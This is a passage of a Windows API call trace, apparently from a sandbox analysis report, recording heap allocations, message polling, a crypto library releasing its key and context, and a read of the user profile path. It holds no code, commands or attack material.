lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0232.964] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0232.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0232.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0232.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0232.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0232.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0232.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0232.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0232.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0232.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0232.965] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0232.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0232.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0232.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0232.965] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0232.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0232.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0232.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0232.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0232.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0232.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0232.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0232.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0232.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0232.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0232.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0232.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0232.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0232.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0232.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0232.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0232.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0232.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0232.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0232.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0232.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0232.966] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0232.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0232.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0232.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0232.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0232.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0232.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0232.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51130, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0232.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0232.968] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0232.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0232.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0232.968] CryptDestroyKey (hKey=0xa87490) returned 1 [0232.968] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0232.968] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0232.968] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0232.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0232.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0232.968] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0232.968] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0232.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0232.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0232.969] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0232.969] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0232.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0232.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0232.969] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0232.969] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0232.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0232.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.969] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0232.969] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0232.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0232.969] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0232.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0232.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0232.969] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0232.969] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0232.969] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.970] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0232.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0232.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.970] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.970] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0232.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0232.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0232.970] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0232.970] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0232.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0232.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0232.970] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.970] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0232.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0232.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0232.970] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0232.970] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.970] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0232.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.970] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0232.971] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0232.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0232.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0232.971] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0232.971] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0232.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0232.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0232.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0232.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0232.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0232.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0232.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0232.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0232.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0232.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0232.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0232.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0232.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0232.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0232.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0232.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0232.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0232.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0232.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0232.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0232.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0232.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0232.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0232.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0232.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0232.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0232.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0232.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0232.972] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0232.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0232.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0232.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0232.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0232.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0232.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0232.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0232.972] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0232.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0232.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0232.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0232.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0232.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0232.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0232.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0232.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0232.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0232.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0232.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0232.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0232.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0232.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0232.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0232.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0232.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0232.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0232.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0232.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0232.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0232.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.973] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0232.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0232.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0232.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0232.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0232.974] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.974] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0232.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0232.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0232.974] FreeLibrary (hLibModule=0x756e0000) returned 1 [0232.974] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.974] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.974] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0232.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0232.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0232.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0232.974] CloseHandle (hObject=0x2d0) returned 1 [0232.977] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0232.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0232.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0232.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0232.977] CloseHandle (hObject=0x2a0) returned 1 [0232.981] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0232.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0232.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0232.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0232.984] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0232.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0232.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0232.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0232.984] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf 